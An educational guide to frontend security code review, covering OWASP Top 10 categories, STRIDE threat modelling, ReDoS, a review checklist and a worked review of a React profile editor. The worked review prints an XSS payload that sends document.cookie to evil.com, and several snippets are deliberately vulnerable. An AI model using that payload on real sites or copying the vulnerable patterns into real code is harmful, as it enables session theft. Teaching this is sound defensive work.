Security Review Mindset
Stop Reviewing for Correctness, Start Reviewing for Exploitability
Most code reviews ask: "Does this code do what it's supposed to?" A security review asks a different question: "What can this code be made to do that it's not supposed to?"
That shift — from correctness to exploitability — is the entire security review mindset. You're not looking for bugs. You're looking for features that an attacker would love. Every input that's read, every output that's rendered, every trust boundary that's crossed is a potential attack surface.
The best security reviewers aren't the ones who know the most CVEs. They're the ones who instinctively ask "what if this value is something I don't expect?" at every data boundary in the code.
Think of code review like inspecting a house you're about to buy. A normal inspector checks that the plumbing works, the roof doesn't leak, the foundation is solid. A security inspector thinks like a burglar: "Can I pick this lock? Is this window accessible from the alley? Does the alarm have a bypass? What if I cut the power?" You're not there to verify the house works — you're there to find every way someone could break in. Both perspectives are necessary, but most developers only do the first.
The Three Questions for Every Code Change
Before diving into specific patterns, train yourself to ask these three questions about every piece of code you review:
1. Where Does User Input Enter?
"User input" is broader than form fields. It includes:
- URL parameters and path segments
- Request headers (including cookies, `Origin`, `Referer`)
- `postMessage` event data
- Clipboard paste content
- File uploads (name, type, content)
- Third-party API responses (treat them as untrusted)
- URL hash fragments
- `localStorage`/`sessionStorage` (can be written by XSS and then read "legitimately")
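To make the boundary concrete, here is a small sketch (the helper name `extractUntrustedInputs` is illustrative, not from the original) showing how even a single URL carries several distinct untrusted inputs:

```javascript
// Illustrative sketch: every field pulled out of a URL is untrusted.
// The URL API behaves the same in browsers and Node.
function extractUntrustedInputs(rawUrl) {
  const url = new URL(rawUrl)
  return {
    // Query parameters: ?q=... — a classic injection vector
    params: Object.fromEntries(url.searchParams),
    // Path segments: /users/<id> — often interpolated into API calls
    pathSegments: url.pathname.split('/').filter(Boolean),
    // Hash fragment: never sent to the server, but readable by JS
    hash: url.hash.slice(1),
  }
}

const inputs = extractUntrustedInputs('https://app.example/users/42?q=<script>#token=abc')
// Every one of these values must be validated before it reaches a sink.
```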
2. Where Does Output Leave?
Every output is an injection opportunity:
- `innerHTML`, `outerHTML`, `insertAdjacentHTML` → XSS
- `href`, `src`, `action` attributes → URL injection / open redirect
- `eval`, `Function()`, `setTimeout(string)` → code execution
- `document.cookie` → session manipulation
- `postMessage` → cross-origin data leakage
- `fetch`/`XMLHttpRequest` URLs → SSRF (on server) / data exfiltration
- CSS property values → CSS injection
- Log messages → log injection / log forging
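Before a value reaches any HTML sink, escape it or use a sink that never parses HTML. A minimal hand-rolled escaper for illustration (real code should prefer the framework's built-in escaping or a vetted library):

```javascript
// Minimal escaping sketch: neutralize the five characters HTML cares
// about before a value reaches an HTML sink.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
}

// In the browser, prefer sinks that never parse HTML at all:
//   element.textContent = userValue   // safe: treated as text
//   element.innerHTML  = userValue    // dangerous: treated as markup
```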
3. What Trust Boundaries Are Crossed?
A trust boundary is where data moves between components with different trust levels:
- Client to server (never trust client data on the server)
- Server to client (server data rendered in HTML must be escaped)
- First-party to third-party (API responses, SDKs, iframes)
- User input to DOM (any user-controlled value rendered in the page)
- Parent window to child iframe (postMessage, URL parameters)
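As a sketch of enforcing the parent/iframe boundary, here is a `postMessage` handler that checks `event.origin` against an allowlist (the origin and helper name are assumptions for this example):

```javascript
// Sketch: a postMessage handler that enforces the parent/iframe trust
// boundary. ALLOWED_ORIGINS is an assumption for this example.
const ALLOWED_ORIGINS = new Set(['https://app.example.com'])

function handleMessage(event) {
  // Reject anything from an origin we don't explicitly trust.
  if (!ALLOWED_ORIGINS.has(event.origin)) return null
  // Even from a trusted origin, the payload itself is still untrusted data.
  if (typeof event.data !== 'object' || event.data === null) return null
  return event.data
}

// In the browser:
// window.addEventListener('message', (e) => { const data = handleMessage(e) })
```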
Frontend-Specific OWASP Top 10 (2021)
The OWASP Top 10 (2021 edition) maps directly to frontend vulnerabilities. Here's how each category applies.
A01:2021 Broken Access Control
Frontend impact: Client-side route guards that don't have server-side enforcement. Hiding UI elements instead of enforcing permissions server-side.
```js
// VULNERABLE: permission check only on the frontend
if (user.role === 'admin') {
  showAdminPanel()
}
// Attacker opens DevTools, sets user.role = 'admin', or calls the API directly

// SECURE: server validates permissions on every request.
// The frontend hides/shows UI for UX, not for security.
```
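A hedged sketch of what that server-side enforcement might look like, as an Express-style middleware (`requireRole` is illustrative, not from the original):

```javascript
// The server re-checks the role on every request instead of trusting
// anything the client sent.
function requireRole(role) {
  return function (req, res, next) {
    // req.user comes from verified server-side session/token state,
    // never from the request body or a client-supplied field.
    if (!req.user || req.user.role !== role) {
      res.status(403).json({ error: 'forbidden' })
      return
    }
    next()
  }
}

// Usage (Express-style): app.get('/admin', requireRole('admin'), adminHandler)
```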
A02:2021 Cryptographic Failures
Frontend impact: Storing tokens in localStorage, transmitting sensitive data without HTTPS, using Math.random() for security-sensitive values (nonces, tokens).
```js
// VULNERABLE: Math.random is not cryptographically secure
const weakNonce = Math.random().toString(36)

// SECURE: use the Web Crypto API
const array = new Uint8Array(32)
crypto.getRandomValues(array)
const nonce = btoa(String.fromCharCode(...array))
```
A03:2021 Injection
Frontend impact: DOM XSS (innerHTML, eval), template injection (React dangerouslySetInnerHTML, Vue v-html), CSS injection, open redirects via window.location, prototype pollution.
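Prototype pollution deserves a concrete illustration: a naive recursive merge lets a crafted JSON payload write to `Object.prototype`, and blocking the dangerous keys closes the hole (helper names here are illustrative):

```javascript
// Keys that let a payload climb out of the target object and pollute
// shared prototypes.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype'])

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue // drop pollution attempts
    const value = source[key]
    if (value && typeof value === 'object' && !Array.isArray(value)) {
      if (!target[key] || typeof target[key] !== 'object') target[key] = {}
      safeMerge(target[key], value)
    } else {
      target[key] = value
    }
  }
  return target
}

// A payload like {"__proto__": {"isAdmin": true}} is silently dropped:
const merged = safeMerge({}, JSON.parse('{"__proto__":{"isAdmin":true},"name":"a"}'))
```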
A04:2021 Insecure Design
Frontend impact: Missing rate limiting on client-initiated actions, lack of threat modeling for user flows, no abuse-case consideration during design.
A05:2021 Security Misconfiguration
Frontend impact: Missing security headers (CSP, X-Frame-Options, Strict-Transport-Security), exposed source maps in production, debug mode left enabled, verbose error messages.
A06:2021 Vulnerable and Outdated Components
Frontend impact: Outdated npm packages with known CVEs, unused dependencies that still ship to production, polyfills for browsers you no longer support.
A07:2021 Identification and Authentication Failures
Frontend impact: JWTs in localStorage, missing CSRF protection, weak session management, no refresh token rotation, overly permissive CORS.
A08:2021 Software and Data Integrity Failures
Frontend impact: Loading scripts from CDNs without SRI, CI/CD pipelines without artifact verification, auto-updating dependencies without review, npm supply chain attacks, lockfile poisoning, typosquatting packages.
A09:2021 Security Logging and Monitoring Failures
Frontend impact: No CSP violation reporting, no client-side error monitoring, no tracking of failed authentication attempts, browser console errors swallowed silently.
A10:2021 Server-Side Request Forgery (SSRF)
Frontend impact: Server-side rendering that fetches user-controlled URLs, API routes that proxy requests to user-supplied endpoints, image optimization endpoints that accept arbitrary URLs.
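A minimal SSRF guard for such an endpoint might allowlist hosts before fetching (the hostnames here are assumptions for the example):

```javascript
// SSRF guard sketch for a proxy or image-optimization endpoint: only
// fetch URLs whose host is on an explicit allowlist.
const ALLOWED_HOSTS = new Set(['images.example.com', 'cdn.example.com'])

function isSafeFetchUrl(rawUrl) {
  let url
  try {
    url = new URL(rawUrl)
  } catch {
    return false // not a parseable absolute URL
  }
  // Block non-HTTPS schemes (file:, gopher:, plain http:) outright.
  if (url.protocol !== 'https:') return false
  // Host allowlisting also blocks internal targets like 169.254.169.254.
  return ALLOWED_HOSTS.has(url.hostname)
}
```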
Threat Modeling for Frontend Applications
Threat modeling is the structured process of identifying threats before they become vulnerabilities. For frontend applications, use this simplified framework.
Step 1: Draw the Data Flow
Map every data flow in your application:
```text
User Input → Browser → Your Server → Database
                ↑↓
        Third-Party APIs
                ↑↓
       CDN / Static Assets
                ↑↓
        Embedded Iframes
```
Step 2: Identify Assets
What's valuable to an attacker?
- User session tokens / auth state
- Personal data (email, name, payment info)
- Application state that grants privileges
- API keys or secrets exposed to the client
- User-generated content that could be weaponized
Step 3: Apply STRIDE at Each Boundary
| Threat | Frontend Example |
|---|---|
| Spoofing | Forging the Origin header, session hijacking |
| Tampering | Modifying localStorage, prototype pollution, DOM manipulation |
| Repudiation | Actions without audit trails, unsigned client-side logs |
| Information disclosure | Source maps in production, verbose errors, JWT payload exposure |
| Denial of service | Regex DoS (ReDoS), infinite loops from user input, memory exhaustion |
| Elevation of privilege | Client-side role checks, DOM clobbering globals, XSS to admin actions |
Step 4: Prioritize by Impact and Likelihood
Not all threats are equal. An XSS in the login page is critical. A CSS injection in a static about page is low priority. Focus review effort on:
- Authentication and session management code
- Payment and financial operations
- Admin/privileged functionality
- User-generated content rendering
- Third-party integrations
ReDoS: The Regex Denial of Service You Forgot About
Regular expressions with certain patterns can take exponential time on crafted input. If your frontend validates user input with regex, an attacker can craft a string that freezes the browser tab:
```js
// VULNERABLE: nested quantifiers cause catastrophic backtracking
const emailRegex = /^([a-zA-Z0-9]+)*@([a-zA-Z0-9]+\.)+[a-zA-Z]+$/

// Malicious input that triggers exponential backtracking:
emailRegex.test('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!')
// The engine tries every possible way to split the 'a's across the
// repeated group before concluding the '!' doesn't match — this can
// hang the tab for minutes (regex matching blocks the main thread)
```

Prevention: use a linear-time regex engine (such as RE2), limit input length before regex evaluation, or prefer built-in validators (the `URL` constructor, `<input type="email">`) over hand-rolled regex.
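A safer validation sketch: cap the input length first, then use a regex with no nested quantifiers (the pattern and length limit are illustrative):

```javascript
// ReDoS-resistant validation: each repetition group is anchored by a
// literal '.' so the engine never has ambiguous ways to split the input.
const SIMPLE_EMAIL = /^[a-zA-Z0-9._-]+@[a-zA-Z0-9-]+(\.[a-zA-Z0-9-]+)+$/

function looksLikeEmail(input) {
  // Length cap first: even a pathological regex can't blow up on
  // input it never sees.
  if (typeof input !== 'string' || input.length > 254) return false
  return SIMPLE_EMAIL.test(input)
}
```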
The Security Review Checklist
Use this checklist for every PR that handles user input, authentication, or cross-origin communication.
Input Handling
- Every user input is validated (type, length, format) before use
- No raw user input in `innerHTML`, `outerHTML`, or `insertAdjacentHTML`
- No user input in `eval`, `Function()`, or `setTimeout`/`setInterval` with strings
- URL inputs validated for scheme (only `https:` and `http:`) before use in `href`, `src`, or `window.location`
- JSON input parsed with try/catch and validated against a schema
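The URL-scheme item above can be implemented with the standard `URL` parser rather than string checks (the base URL here is an assumption; in the browser you would use `document.baseURI`):

```javascript
// Scheme allowlist sketch: 'javascript:' and 'data:' URLs in href/src
// are XSS vectors, so only http(s) survives.
function safeHref(rawUrl) {
  try {
    // Resolving against a base lets relative URLs parse too.
    const url = new URL(rawUrl, 'https://app.example.com/')
    return ['https:', 'http:'].includes(url.protocol) ? url.href : null
  } catch {
    return null // unparseable input is rejected, not guessed at
  }
}
```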
Authentication & Session
- Auth tokens not stored in localStorage or sessionStorage
- Cookies use HttpOnly, Secure, SameSite, and restricted Path
- CSRF protection on all state-changing requests
- Logout actually invalidates the session server-side
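The cookie flags in this checklist map onto a `Set-Cookie` header like the one this illustrative helper builds (most frameworks expose the same flags as options instead of raw strings):

```javascript
// Sketch: a session cookie with the checklist's flags, as a raw
// Set-Cookie header value. Name and lifetime are illustrative.
function sessionCookie(name, value) {
  return [
    `${name}=${encodeURIComponent(value)}`,
    'HttpOnly',       // not readable by JavaScript, so XSS can't steal it
    'Secure',         // only sent over HTTPS
    'SameSite=Lax',   // not sent on cross-site POSTs: CSRF mitigation
    'Path=/',         // restrict further if the app layout allows
    'Max-Age=3600',
  ].join('; ')
}
```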
Headers & Configuration
- CSP deployed with nonce-based `script-src` and `'strict-dynamic'`
- `object-src 'none'` and `base-uri 'self'` in CSP
- `frame-ancestors` set (it does not fall back to `default-src`)
- `Strict-Transport-Security` with a long `max-age`
- Source maps disabled in production builds
Third-Party Code
- New dependencies audited (downloads, maintainers, install scripts)
- Lockfile changes reviewed for unexpected registry URLs or hash changes
- External scripts have SRI integrity attributes
- `postMessage` handlers validate `event.origin`
Data Exposure
- No secrets, API keys, or tokens in client-side bundles
- Error messages don't expose stack traces or internal paths
- JWT payloads don't contain sensitive data (they're base64, not encrypted)
- `console.log` statements removed from production code
Production Scenario: Reviewing a Feature PR
Let's walk through how a security-focused engineer reviews a PR that adds user profile editing.
```jsx
function ProfileEditor({ user }) {
  const [bio, setBio] = useState(user.bio)

  async function handleSave() {
    await fetch('/api/profile', {
      method: 'PUT',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ bio }),
    })
  }

  return (
    <div>
      <textarea
        value={bio}
        onChange={(e) => setBio(e.target.value)}
        maxLength={500}
      />
      <button onClick={handleSave}>Save</button>
      <div dangerouslySetInnerHTML={{ __html: bio }} />
    </div>
  )
}
```
Security review findings:
1. **XSS via dangerouslySetInnerHTML**: The `bio` is user-controlled and rendered as raw HTML. An attacker sets their bio to `<img src=x onerror="fetch('https://evil.com?c='+document.cookie)">` — every visitor to their profile gets XSS'd. Fix: Use `{bio}` (escaped by React) or sanitize with DOMPurify.
2. **Client-side length validation only**: `maxLength={500}` on the textarea is a UX hint, not security. An attacker can send any length via the fetch call directly. Fix: Server-side validation is the enforcement point.
3. **No CSRF protection**: The PUT request uses JSON, which triggers a preflight (good), but if CORS is misconfigured on the server, CSRF is possible. Fix: Verify the CORS config rejects unexpected origins.
4. **Missing authentication check**: The fetch call doesn't include credentials or auth headers. If using cookie-based auth, add `credentials: 'include'`. If using tokens, add the `Authorization` header. Fix: Ensure the request is authenticated.
5. **No error handling**: If the save fails, the user sees no feedback and may retry, potentially sending the same mutation multiple times. Fix: Handle errors and show user feedback.
| What developers do | What they should do |
|---|---|
| Only looking for dangerous function names like eval and innerHTML during security review. Searching for function names catches surface-level issues but misses indirect data flows where user input reaches a dangerous sink through several transformations; data flow tracing catches both direct and indirect injection paths. | Tracing complete data flows from input sources to output sinks, checking validation at each boundary |
| Treating client-side validation as a security control. Any client-side check can be bypassed by opening DevTools, modifying the request, or calling the API directly. Client-side validation makes the form user-friendly; server-side validation makes it secure. Both are needed, but only the server-side check is a security control. | Understanding that client-side validation is UX only — all security enforcement must happen server-side |
| Assuming a framework's default escaping covers all XSS vectors. Frameworks escape text interpolation by default, which prevents the most common XSS patterns. But they provide escape hatches for rendering raw HTML, and they don't sanitize URL attributes like href. Each escape hatch is an unguarded injection sink that needs explicit review. | Auditing every escape hatch (dangerouslySetInnerHTML, v-html, href attributes, bypassSecurityTrust) |
Challenge: Security Code Review
Try to solve it before peeking at the answer.
```js
app.get('/search', (req, res) => {
  const query = req.query.q
  const results = searchDatabase(query)
  // Template literal builds HTML with user input:
  //   <h1>Results for: [query]</h1>
  //   <ul>[results mapped to <li> tags]</ul>
  //   <script>window.searchQuery = "[query]"</script>
  res.send(buildSearchPage(query, results))
})
```
1. Ask "what if this value is something unexpected" at every data boundary — think like an attacker, not a developer
2. Trace data flow from input sources to output sinks — missing validation at any step is a vulnerability
3. Client-side validation is UX, not security — all enforcement must happen server-side
4. Every `dangerouslySetInnerHTML`, `v-html`, `innerHTML`, and `href` attribute is a potential injection sink that needs explicit review
5. Apply the STRIDE model at each trust boundary: Spoofing, Tampering, Repudiation, Information disclosure, DoS, Elevation of privilege
6. The OWASP Top 10 2021 A08 covers software and data integrity failures, including supply chain risks — review dependencies and integrity in every PR